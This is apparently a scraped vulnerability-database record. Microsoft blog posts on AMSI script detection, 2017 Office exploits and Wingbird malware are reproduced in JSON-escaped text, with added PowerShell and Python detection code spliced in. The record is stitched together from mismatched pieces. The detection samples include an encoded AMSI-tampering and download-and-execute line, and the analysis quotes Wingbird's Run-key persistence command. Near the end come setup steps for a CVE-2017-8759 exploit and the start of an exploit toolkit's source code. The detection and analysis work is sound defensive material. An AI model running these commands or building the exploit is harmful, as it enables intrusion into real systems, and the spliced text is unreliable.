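The script features named earlier (count of obfuscation layers, entropy, specific API invocations) and the first bypass category above (bypass code that is itself part of the script content) can both be checked on content a defender already has, such as the ScriptBlockText of PowerShell event 4104 or a buffer handed to an AMSI provider. The PowerShell below is an added example, not Microsoft's classifier and not code from the post: it peels base64 layers, computes Shannon entropy, and flags text that names the AMSI internals public bypasses touch. The indicator list, weights, thresholds and the two sample scripts are constructed for this example.

```powershell
# Added example (not from the Microsoft post): score captured script content
# by obfuscation layers, entropy and AMSI-tampering indicators. The indicator
# list, weights, thresholds and sample inputs are assumptions of this example.

function Get-ShannonEntropy {
    param([string]$Text)
    if (-not $Text) { return 0.0 }
    $counts = @{}
    foreach ($ch in $Text.ToCharArray()) { $counts[$ch] = 1 + [int]$counts[$ch] }
    $len = $Text.Length
    $h = 0.0
    foreach ($n in $counts.Values) {
        $p = $n / $len
        $h -= $p * [math]::Log($p, 2)
    }
    return [math]::Round($h, 2)
}

function Expand-Base64Layers {
    # Repeatedly decode base64 blobs (as -EncodedCommand or FromBase64String
    # would) until none decode; returns the innermost text and the layer count.
    param([string]$Text, [int]$MaxLayers = 8)
    $layers = 0
    $current = $Text
    while ($layers -lt $MaxLayers) {
        $m = [regex]::Match($current, '[A-Za-z0-9+/]{40,}={0,2}')
        if (-not $m.Success) { break }
        try { $bytes = [Convert]::FromBase64String($m.Value) } catch { break }
        # -EncodedCommand carries UTF-16LE; FromBase64String payloads are usually UTF-8.
        if ($bytes.Length -ge 2 -and $bytes.Length % 2 -eq 0 -and $bytes[1] -eq 0) {
            $decoded = [Text.Encoding]::Unicode.GetString($bytes)
        } else {
            $decoded = [Text.Encoding]::UTF8.GetString($bytes)
        }
        $current = $current.Replace($m.Value, $decoded)
        $layers++
    }
    [pscustomobject]@{ Text = $current; Layers = $layers }
}

function Test-ScriptContent {
    param([string]$ScriptText)
    $peeled  = Expand-Base64Layers -Text $ScriptText
    $plain   = $peeled.Text
    $entropy = Get-ShannonEntropy $ScriptText

    # Names that public AMSI bypasses rely on: the managed AmsiUtils type and its
    # amsiInitFailed field, the native scan export, the DLL itself.
    $amsiIndicators = @('AmsiUtils', 'amsiInitFailed', 'AmsiScanBuffer', 'amsi.dll', 'AmsiContext', 'AmsiSession')
    $amsiHits = @($amsiIndicators | Where-Object { $plain -match [regex]::Escape($_) })

    # Generic download-and-execute / reflection behaviour worth a second look.
    $execHits = @(@('Invoke-Expression', 'IEX', 'DownloadString', 'FromBase64String', 'GetField', 'NonPublic') |
        Where-Object { $plain -match "(?i)\b$([regex]::Escape($_))\b" })

    $score = 2 * $peeled.Layers + 5 * $amsiHits.Count + $execHits.Count
    if ($entropy -gt 5.0) { $score += 2 }
    $verdict = if ($amsiHits.Count -gt 0) { 'alert: AMSI tampering' }
               elseif ($score -ge 4)      { 'suspicious' }
               else                       { 'benign-looking' }

    [pscustomobject]@{
        Layers        = $peeled.Layers
        Entropy       = $entropy
        AmsiTampering = $amsiHits -join ','
        OtherHits     = $execHits -join ','
        Score         = $score
        Verdict       = $verdict
    }
}

# Constructed samples (not real captures): a benign admin one-liner, and a
# base64-wrapped command line that names AmsiUtils/amsiInitFailed and then
# downloads and evaluates remote code. The inner text is descriptive only.
$benign  = 'Get-Service | Where-Object Status -eq Running | Sort-Object Name'
$inner   = 'GetType("System.Management.Automation.AmsiUtils") # set amsiInitFailed, then IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/p")'
$wrapped = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($inner))
$encoded = "powershell -nop -w hidden -EncodedCommand $wrapped"

Test-ScriptContent $benign
Test-ScriptContent $encoded
```

The first sample scores zero; the second decodes one layer, lands two AMSI indicators plus IEX and DownloadString, and is reported as AMSI tampering. This is deliberately string-based, which is the first bypass category the post lists; the other two (tampering with the sensor files or DLL load order, and patching AMSI in memory) leave nothing in the script text and need the host-side anti-tampering telemetry the post describes.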
Windows Defender Antivirus, specifically, utilizes AMSI to dynamically inspect and block scripts responsible for dropping all kinds of malicious payloads, including ransomware and banking trojans.\n\nWith [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>) (1709), newly added script runtime instrumentation provides unparalleled visibility into script behaviors despite obfuscation. Windows Defender Antivirus uses this treasure trove of behavioral information about malicious scripts to deliver pre-breach protection at runtime. To deliver post-breach defense, Windows Defender ATP uses advanced machine learning systems to draw deeper insight from this data.\n\nApart from looking at specific activities and patterns of activities, new machine learning algorithms in Windows Defender ATP look at script obfuscation layers, API invocation patterns, and other features that can be used to efficiently identify malicious scripts heuristically. Windows Defender ATP also correlates script-based indicators with other proximate activities, so it can deliver even richer contextual information about suspected breaches.\n\nTo benefit from the new script runtime instrumentation and other powerful security enhancements like [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/>), customers are encouraged to install [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>).\n\nRead [The Total Economic Impact of Microsoft Windows Defender Advanced Threat Protection from Forrester](<https://wincom.blob.core.windows.net/documents/WDATP_TEI%20_infographic%20_final.pdf>) to understand the significant cost savings and business benefits enabled by Windows Defender ATP. 
To directly experience how Windows Defender ATP can help your enterprise detect, investigate, and respond to advanced attacks, [sign up for a free trial](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>).\n\n \n\n**Stefan Sellmer**, _Windows Defender ATP Research_\n\n_with_\n\n**Shay Kels**_, Windows Defender ATP Research _\n\n**Karthik Selvaraj**,_ Windows Defender Research_\n\n#### \n\n \n\n##### **Additional readings**\n\n * [Defend against PowerShell attacks](<https://blogs.msdn.microsoft.com/powershell/2017/10/23/defending-against-powershell-attacks/>), by Lee Holmes and the PowerShell team\n * [Windows Defender ATP machine learning: Detecting new and unusual breach activity](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>)\n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>) and [Windows Defender Security Intelligence](<https://www.microsoft.com/en-us/wdsi>).\n\nFollow us on Twitter [@WDSecurity](<https://twitter.com/WDSecurity>) and Facebook [Windows Defender Security Intelligence](<https://www.facebook.com/MsftWDSI/>).", "modified": "2017-12-04T14:00:07", "published": "2017-12-04T14:00:07", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2017/12/04/windows-defender-atp-machine-learning-and-amsi-unearthing-script-based-attacks-that-live-off-the-land/", "id": "MSSECURE:30A997667BFA925FD541E3DCB1F1DEB6", "type": "mssecure", "title": "Windows Defender ATP machine learning and AMSI: Unearthing script-based attacks that \u2018live off the land\u2019", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-16T03:40:26", "bulletinFamily": "blog", "cvelist": ["CVE-2015-5119", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-1099", "CVE-2017-11292", 
"CVE-2017-11826", "CVE-2017-8570", "CVE-2017-8750", "CVE-2017-8759"], "description": "The Office 365 Threat Research team has seen an uptick in the use of Office exploits in attacks across various industry sectors in recent months. In this blog, we will review several of these exploits, including a group of Office moniker exploits that attackers have used in targeted as well as crimeware attacks. We will also describe the payloads associated with these exploits and highlight our research into a particularly sophisticated piece of malware. Finally, we will demonstrate how [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>), [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>), and [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware?ocid=cx-blog-mmpc>) protect customers from these exploits.\n\n## Exploit attacks in Fall 2017\n\nThe discovery and public availability of a few Office exploits in the last six months led to these exploits gaining popularity among crimeware and targeted attackers alike. While crimeware attackers stick to payloads like [ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) and [info stealers](<https://blogs.technet.microsoft.com/mmpc/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/>) to attain financial gain or information theft, more sophisticated attackers clearly distinguish themselves by using advanced and multi-stage implants.\n\nThe Office 365 Threat Research team has been closely monitoring these attacks. 
The Microsoft Threat Intelligence Center (MSTIC) backs up our threat research with premium threat intelligence services that we use to correlate and track attacks and the threat actors behind them.\n\n### CVE-2017-0199\n\n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>) is a remote code execution (RCE) vulnerability in Microsoft Office that allows a remote attacker to take control of a vulnerable machine if the user chooses to ignore the Protected View warning message. The vulnerability, which is a logic bug in the URL moniker that executes HTA content using the _htafile_ OLE object, was fixed in the [April 2017 security updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/42b8fa28-9d09-e711-80d9-000d3a32fc99>).\n\n\n\n_Figure 1. CVE-2017-0199 exploit code_\n\nEver since [FireEye blogged](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) about the vulnerability, we have identified numerous attacks using this exploit. The original exploit was used in limited targeted attacks, but soon after, commodity crimeware started picking it up from the publicly available exploit generator toolkits. As shown in Figure 2, the _creator_ and _lastModifiedBy_ attributes help identify the use of such toolkits in generating exploit documents.\n\n\n\n_Figure 2. Exploit kit identifier_\n\nA slight variation of this exploit, this time in the script moniker, was also released. When activated, this exploit can launch [scriptlets](<https://msdn.microsoft.com/en-us/library/office/aa189871\\(v=office.10\\).aspx>) (which consist of HTML code and script) hosted on a remote server. A proof-of-concept (PoC) made publicly available used a Microsoft PowerPoint Slideshow (PPSX) file to activate the script moniker and execute remote code, as shown in Figure 3.\n\n\n\n_Figure 3. 
PPSX activation for script moniker_\n\n### CVE-2017-8570\n\nThe [July 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/f2b16606-4945-e711-80dc-000d3a32fc99>) from Microsoft included a fix for another variation of the CVE-2017-0199 exploit, [CVE-2017-8570](<https://nvd.nist.gov/vuln/detail/CVE-2017-8570>), which was found in the URL moniker and which, like the HTA case, can launch scriptlets hosted on a remote server. Even though the vulnerability was not exploited as a zero-day, the [public availability](<https://github.com/Ring0Mob/CVE-2017-8570>) of an exploit toolkit created a wave of malicious PPSX attachments.\n\n### CVE-2017-8759\n\nIn September 2017, [FireEye discovered](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) another zero-day exploit used in targeted attacks. The [CVE-2017-8759 exploit](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>) takes advantage of a code injection vulnerability in the .NET Framework while parsing a WSDL definition using the SOAP moniker. The vulnerability was fixed in the [September 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/5984735e-f651-e711-80dd-000d3a32fc99>). The original exploit used an HTA file, similar to CVE-2017-0199, to execute the attacker's code on vulnerable machines. This exploit piqued our interest because it delivered one of the most complex, multiply VM-layered malware families we have seen, FinFisher, whose techniques we discuss in the succeeding section.\n\nThe CVE-2017-8759 exploit soon got ported to PPSX files. Figure 4 below shows an example of the exploit.\n\n\n\n_Figure 4. 
CVE-2017-8759 exploit_\n\n### CVE-2017-11826\n\nFinally, on September 28, 2017, [Qihoo 360](<https://360coresec.blogspot.dk/2017/10/new-office-0day-cve-2017-11826.html>) identified an RTF file in targeted attacks that exploited a memory corruption vulnerability in Microsoft Office. The vulnerability exists in the way Office parses objects within nested Office tags and was fixed in the [October 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/313ae481-3088-e711-80e2-000d3a32fc99>). Forced address space layout randomization (ASLR) prevented the exploit from running in Office 2013 and above. Figure 5 shows the nested tags from the original exploit that led to the bug.\n\n\n\n_Figure 5. CVE-2017-11826 exploit_\n\n## Payloads\n\nExcept for the memory corruption exploit CVE-2017-11826, the exploits discussed in this blog pull the malware payload from remote locations, which could make it difficult for antivirus and sandboxes to reliably detect these exploits. Additionally, the public availability of scripts that generate exploit templates could make it challenging for incident responders.\n\nAs cited above, these exploits were used in both commodity and targeted attacks. Attackers attempt to bypass AV engine defenses using different obfuscation techniques. Here are some of the obfuscation techniques used in attacks that we recently analyzed:\n\n * Attackers used HLFL as an element type in the malicious RTF attachment. This element is not supported in the official RTF specification but serves as an effective obfuscation against static detections.\n\n\n\n * Similarly, we have seen attackers using ATNREF and MEQARR elements in malicious RTF attachments.\n\n\n\nIn most of the attacks we analyzed, the exploits used PowerShell to download and execute malware payloads, which are usually crimeware samples like ransomware or info stealers.\n\n\n\n_Figure 6. 
PowerShell payload from the HTA file_

However, every now and then, we stumble upon an interesting piece of malware that particularly catches our attention. One such malware is Wingbird, also known as FinFisher, which was used in one of the targeted attacks using the CVE-2017-8759 exploit.

### WingBird (also known as FinFisher)

[Wingbird](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Wingbird.A!dha>) is an advanced piece of malware that shares characteristics with a government-grade commercial surveillance software, FinFisher. The activity group [NEODYMIUM](<https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/>) is known to use this malware in their attack campaigns.

The group behind WingBird has proven to be highly capable of using zero-day exploits in their attacks, as mentioned in our [previous blog post on CVE-2017-8759](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>). So far, we have seen the group use the exploits below in campaigns. These are mostly in line with the findings of Kaspersky Labs, which they documented in a [blog](<https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/>):

 * CVE-2015-5119 (Adobe Flash)
 * CVE-2016-4117 (Adobe Flash)
 * CVE-2017-8759 (Microsoft Office)
 * CVE-2017-11292 (Adobe Flash)

The interesting part of this malware is the use of spaghetti code, multiple virtual machines, and lots of anti-debug and anti-analysis techniques. Due to the complexity of the threat, it could take analysts some time to completely unravel its functionality. Here's a summary of interesting tidbits, which we will expand on in an upcoming detailed report on Wingbird.

The Wingbird malware goes through many stages of execution and has at least four VMs protecting the malware code.
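
Before going further into Wingbird, here is a small static check for the RTF obfuscation described in the Payloads section above. It is an added example, not Microsoft's code: KNOWN_WORDS is a constructed subset of the RTF control-word list, and both sample documents are constructed.

```python
"""Static triage for the RTF obfuscation tricks described in the Payloads section.

Added example (not Microsoft's code). It tokenises RTF control words, flags
the unsupported ones the post names (HLFL, ATNREF, MEQARR), flags any other
control word outside a known-good list, and records the OLE-object markers
that CVE-2017-0199-style documents depend on. KNOWN_WORDS is a constructed
subset of the RTF specification, large enough for the samples below; a real
deployment would load the full list.
"""
import re
from dataclasses import dataclass, field

# \word or \word123, optionally followed by one delimiting space.
CONTROL_WORD = re.compile(rb"\\([A-Za-z]+)(-?\d+)? ?")

KNOWN_WORDS = {
    "rtf", "ansi", "ansicpg", "deff", "deflang", "fonttbl", "f", "fnil", "fcharset",
    "pard", "par", "plain", "fs", "b", "i", "uc", "info", "author", "operator",
    "xmlnstbl", "xmlns", "object", "objemb", "objautlink", "objupdate", "objclass",
    "objdata", "objw", "objh", "objscalex", "objscaley", "rsltpict", "result",
    "rtlch", "ltrch", "fcs", "af", "insrsid", "datastore",
}

# Control words seen in the campaigns the post describes; none is in the spec.
OBFUSCATION_WORDS = {"hlfl", "atnref", "meqarr"}
OLE_WORDS = {"object", "objemb", "objautlink", "objdata"}


@dataclass
class RtfTriage:
    obfuscation_words: set = field(default_factory=set)
    unknown_words: set = field(default_factory=set)
    has_ole_object: bool = False
    auto_updating_link: bool = False   # \objupdate: the link is refreshed on open

    def reasons(self) -> list:
        out = []
        if self.obfuscation_words:
            out.append("unsupported control words used as obfuscation: "
                       + ", ".join(sorted(self.obfuscation_words)))
        if self.has_ole_object and self.auto_updating_link:
            out.append("OLE object marked \\objupdate (fetched automatically on open)")
        if self.has_ole_object and self.unknown_words:
            out.append("OLE object next to unknown control words: "
                       + ", ".join(sorted(self.unknown_words)))
        return out

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons())


def triage_rtf(data: bytes) -> RtfTriage:
    """Scan raw RTF bytes. Comparison is case-insensitive on purpose, so that
    casing variations cannot hide a known or a flagged control word."""
    result = RtfTriage()
    for match in CONTROL_WORD.finditer(data):
        word = match.group(1).decode("ascii").lower()
        if word in OBFUSCATION_WORDS:
            result.obfuscation_words.add(word)
        elif word not in KNOWN_WORDS:
            result.unknown_words.add(word)
        if word in OLE_WORDS:
            result.has_ole_object = True
        if word == "objupdate":
            result.auto_updating_link = True
    return result


# Constructed samples. The second mimics the shape of a CVE-2017-0199-style
# attachment: an auto-updating OLE link wrapped in the unsupported HLFL
# control word; the objdata hex is a placeholder, not a real object.
BENIGN_RTF = (b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0\\fnil Calibri;}}"
              b"\\pard\\f0\\fs22 Quarterly report attached.\\par}")
OBFUSCATED_RTF = (b"{\\rtf1\\ansi\\deff0{\\HLFL{\\object\\objautlink\\objupdate"
                  b"{\\*\\objclass Word.Document.8}{\\*\\objdata 0105000002000000}}}"
                  b"\\pard Please review.\\par}")

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_RTF), ("obfuscated", OBFUSCATED_RTF)):
        verdict = triage_rtf(blob)
        print(name, "suspicious" if verdict.suspicious else "clean", verdict.reasons())
```
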
The first few stages are loaders that can probe whether they are being run in a virtualized or debugged environment. We found at least 12 different checks that stop the malware from executing in such environments. The most effective ones are:

 * Sandbox environment checks
   * Checks if the malware is executed under the root folder of a drive
   * Checks if the malware file is readable from an external source and if the execution path contains the MD5 of its own contents
 * Fingerprinting check
   * Checks if the machine GUID, Windows product ID, and system BIOS are from well-known sources
 * VM detection
   * Checks if the machine hardware IDs are _VmBus_ in the case of Hyper-V, or _VEN_15AD_ in the case of VMware, etc.
 * Debugger detection
   * Detects a debugger and tries to kill it using undocumented APIs and information classes (specifically _ThreadHideFromDebugger_, _ProcessDebugPort_, _ProcessDebugObjectHandle_)

The latter stages act as an installation program that drops the following files on disk and installs the malware based on the startup command received from the previous stage:

 * _[randomName].cab_ - Encrypted configuration file
 * _setup.cab_ - The last PE code section of the setup module; content still unknown
 * _d3d9.dll_ - Malware loader used on systems with restricted privileges; the module is protected by a VM
 * _aepic.dll_ (or other name) - Malware loader used on admin-privileged systems; executed from (and injected into) a faked service; protected by a VM
 * _msvcr90.dll_ - Malware loader DLL injected into the explorer.exe or winlogon.exe process; protected by a VM
 * _[randomName].7z_ - Encrypted network plugin, used to spy on the victim's network communications
 * _wsecedit.rar_ - Main malware dropped executable, protected by a VM

In the sample we analyzed, the command was 3, which led the malware to create a global event, _0x0A7F1FFAB12BB2_, and drop malware components under a folder located in
[_%ProgramData%_](<https://www.microsoft.com/en-us/wdsi/help/folder-variables#programdata>), or in the _[%APPDATA%](<https://www.microsoft.com/en-us/wdsi/help/folder-variables#appdata>)_ folder. If the malware is running with restricted privileges, persistence is achieved by setting a Run key with the value below. The value name is taken from the encrypted configuration file.

_HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run_
_Value: "{Random value taken from config file}"_
_With data: "C:\WINDOWS\SYSTEM32\RUNDLL32.EXE C:\PROGRAMDATA\AUDITAPP\D3D9.DLL, CONTROL_RUN"_

If the startup command is 2, the malware copies explorer.exe into the local installation directory, renames _d3d9.dll_ to _uxtheme.dll_, and creates a new _explorer.exe_ process that loads the malware DLL into memory using the DLL sideloading technique.

All of Wingbird's plugins are stored in its resource section and provide the malware with various capabilities, including stealing sensitive information, spying on internet connections, or even diverting SSL connections.

Given the complex nature of the threat, we will provide a more detailed analysis of the Wingbird protection mechanism and capabilities in an upcoming blog post.

## Detecting Office exploit attacks with Office 365 ATP and Windows Defender Suite

Microsoft [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>) blocks attacks that use these exploits based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files, leveraging time-of-click protection. SecOps personnel can see ATP behavioral detections like the one below in Office 365's Threat Explorer page:

_Figure 7.
Office 365 ATP detection_

Customers using [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>) can also see multiple alerts raised based on the activities performed by the exploit on compromised machines. Windows Defender ATP is a post-breach solution that alerts SecOps personnel about hostile activity. Windows Defender ATP uses rich security data, advanced behavioral analytics, and machine learning to detect attacks.

_Figure 8. Windows Defender ATP alert_

In addition, enterprises can block malicious documents using [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware?ocid=cx-blog-mmpc>), which is part of the defense-in-depth protection in [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>). The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo!).

_Figure 9. Windows Defender Exploit Guard detection_

Crimeware and targeted activity groups are always on the lookout for attack vectors to infiltrate systems and networks and deploy different kinds of payloads, from commodity to advanced implants. These attack vectors include Office exploits, which we observed in multiple attack campaigns. The availability of open-source and off-the-shelf exploit builders helps drive this trend.

At Microsoft, we don't stop working to protect our customers' mailboxes.
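
The Wingbird Run-key value quoted above can be turned into a host triage check. The following is an added example, not Microsoft's code: it runs over constructed (value name, command) pairs, of which only the rundll32/d3d9.dll entry mirrors the one reported in the post, and needs no registry access.

```python
"""Triage of Run-key entries for the Wingbird persistence pattern quoted above.

Added example (not Microsoft's code). It works on (value name, command) pairs
such as those exported from HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run,
so it needs no registry access; the entries below are constructed, and only the
rundll32 / d3d9.dll value mirrors the one reported in the post.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Loader DLL names the post attributes to Wingbird. Legitimate DLLs with these
# names live under the Windows directory, never under %ProgramData% or %APPDATA%.
MASQUERADED_DLLS = {"d3d9.dll", "uxtheme.dll", "msvcr90.dll", "aepic.dll"}
USER_WRITABLE_HINTS = ("c:\\programdata\\", "\\appdata\\", "c:\\users\\", "\\temp\\")
SYSTEM_ROOTS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
# Export name the post reports for the d3d9.dll loader.
WINGBIRD_EXPORT = "CONTROL_RUN"

# rundll32[.exe], optionally with a path and optionally quoted, then the rest.
RUNDLL32 = re.compile(r'^\s*"?(?:[^"\s]*[\\/])?rundll32(?:\.exe)?"?\s+(?P<rest>.+)$', re.I)


@dataclass
class RunFinding:
    value_name: str
    command: str
    reasons: List[str]


def parse_rundll32(command: str) -> Optional[Tuple[str, str]]:
    """Return (dll_path, export) for a rundll32 command line, else None.
    rundll32 syntax is '<dll>,<export> [args]'; the comma may be followed by
    whitespace, as in the Wingbird value."""
    match = RUNDLL32.match(command)
    if not match:
        return None
    rest = match.group("rest").strip()
    dll, sep, tail = rest.partition(",")
    export = tail.strip().split()[0] if sep and tail.strip() else ""
    return dll.strip().strip('"'), export


def triage_run_entry(value_name: str, command: str) -> Optional[RunFinding]:
    """Apply the three Wingbird-derived checks to one Run entry."""
    parsed = parse_rundll32(command)
    if parsed is None:
        return None
    dll, export = parsed
    dll_l = dll.lower()
    base = dll_l.rsplit("\\", 1)[-1]
    reasons = []
    if any(hint in dll_l for hint in USER_WRITABLE_HINTS):
        reasons.append(f"rundll32 loads {base} from a user-writable location")
    if base in MASQUERADED_DLLS and not dll_l.startswith(SYSTEM_ROOTS):
        reasons.append(f"{base} reuses a system DLL name but lives outside the Windows directory")
    if export.upper() == WINGBIRD_EXPORT:
        reasons.append(f"export {export} matches the Wingbird d3d9.dll loader entry point")
    return RunFinding(value_name, command, reasons) if reasons else None


def triage_run_entries(entries) -> List[RunFinding]:
    findings = []
    for value_name, command in entries:
        finding = triage_run_entry(value_name, command)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed Run-key export. Value names are placeholders.
SAMPLE_RUN_ENTRIES = [
    # Benign: a user-profile updater started by full path, no rundll32 involved.
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    # Benign rundll32 use: DLL under System32, ordinary export.
    ("ShellExtSetup", r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    # Mirrors the Wingbird value quoted in the post (restricted-privilege install).
    ("{random-value-from-config}", r"C:\WINDOWS\SYSTEM32\RUNDLL32.EXE C:\PROGRAMDATA\AUDITAPP\D3D9.DLL, CONTROL_RUN"),
    # Constructed variant of the renamed loader (uxtheme.dll) dropped under %APPDATA%.
    ("ThemeHelper", r'rundll32.exe "C:\Users\alice\AppData\Roaming\AuditApp\uxtheme.dll",Start'),
]

if __name__ == "__main__":
    for finding in triage_run_entries(SAMPLE_RUN_ENTRIES):
        print(finding.value_name, "->", finding.command)
        for reason in finding.reasons:
            print("   ", reason)
```
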
Our global network of expert research teams continuously monitors the threat landscape for new malware campaigns, exploits, and attack methods. Our end-to-end defense suite includes Office 365 ATP, Windows Defender ATP, and Windows Defender Exploit Guard, among others, which work together to provide holistic protection for individuals and enterprises.", "modified": "2017-11-21T13:46:01", "published": "2017-11-21T13:46:01", "id": "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/21/office-365-advanced-threat-protection-defense-for-corporate-networks-against-recent-office-exploit-attacks/", "type": "mssecure", "title": "Office 365 Advanced Threat Protection defense for corporate networks against recent Office exploit attacks", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-03-14T04:24:23", "description": "Exploit for windows platform in category remote exploits", "edition": 1, "published": "2017-09-13T00:00:00", "title": "Microsoft Windows .NET Framework - Remote Code Execution 0day Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8759"], "modified": "2017-09-13T00:00:00", "href": "https://0day.today/exploit/description/28535", "id": "1337DAY-ID-28535", "sourceData": "Source: https://github.com/Voulnet/CVE-2017-8759-Exploit-sample\r\n \r\nRunning CVE-2017-8759 exploit sample.\r\n \r\nFlow of the exploit:\r\n \r\nWord macro runs in the Doc1.doc file. The macro downloads a badly formatted txt file over wsdl, which triggers the WSDL parser log. Then the parsing log results in running mshta.exe which in turn runs a powershell commands that runs mspaint.exe\r\n \r\nTo test:\r\n \r\nRun a webserver on port 8080, and put the files exploit.txt and cmd.hta on its root. 
For example python -m SimpleHTTPServer 8080\r\n \r\nIf all is good mspaint should run.\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/28535"}], "packetstorm": [{"lastseen": "2017-09-15T10:22:49", "description": "", "published": "2017-09-14T00:00:00", "type": "packetstorm", "title": "Microsoft .NET Framework Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8759"], "modified": "2017-09-14T00:00:00", "id": "PACKETSTORM:144148", "href": "https://packetstormsecurity.com/files/144148/Microsoft-.NET-Framework-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/env python \n''' \n \n## Exploit toolkit CVE-2017-8759 - v1.0 (https://github.com/bhdresh/CVE-2017-8759) ## \n \n''' \nimport os,sys,thread,socket,sys,getopt,binascii,shutil,tempfile \nfrom random import randint \nfrom random import choice \nfrom string import ascii_uppercase \nfrom zipfile import ZipFile, ZIP_STORED, ZipInfo \n \n \nBACKLOG = 50 # how many pending connections queue will hold \nMAX_DATA_RECV = 999999 # max number of bytes we receive at once \nDEBUG = True # set to True to see the debug msgs \ndef main(argv): \n# Host and Port information \nglobal port \nglobal host \nglobal filename \nglobal docuri \nglobal payloadurl \nglobal payloadlocation \nglobal custom \nglobal mode \nglobal obfuscate \nglobal payloadtype \nfilename = '' \ndocuri = '' \npayloadurl = '' \npayloadlocation = '' \ncustom = '' \nport = int(\"80\") \nhost = '' \nmode = '' \nobfuscate = int(\"0\") \npayloadtype = 'rtf' \n \n# Capture command line arguments \ntry: \nopts, args = getopt.getopt(argv,\"hM:w:u:p:e:l:H:x:t:\",[\"mode=\",\"filename=\",\"docuri=\",\"port=\",\"payloadurl=\",\"payloadlocation=\",\"custom=\",\"obfuscate=\",\"payloadtype=\"]) \nexcept getopt.GetoptError: \nprint 'Usage: python '+sys.argv[0]+' -h' \nsys.exit(2) \nfor opt, arg in opts: \nif opt == '-h': 
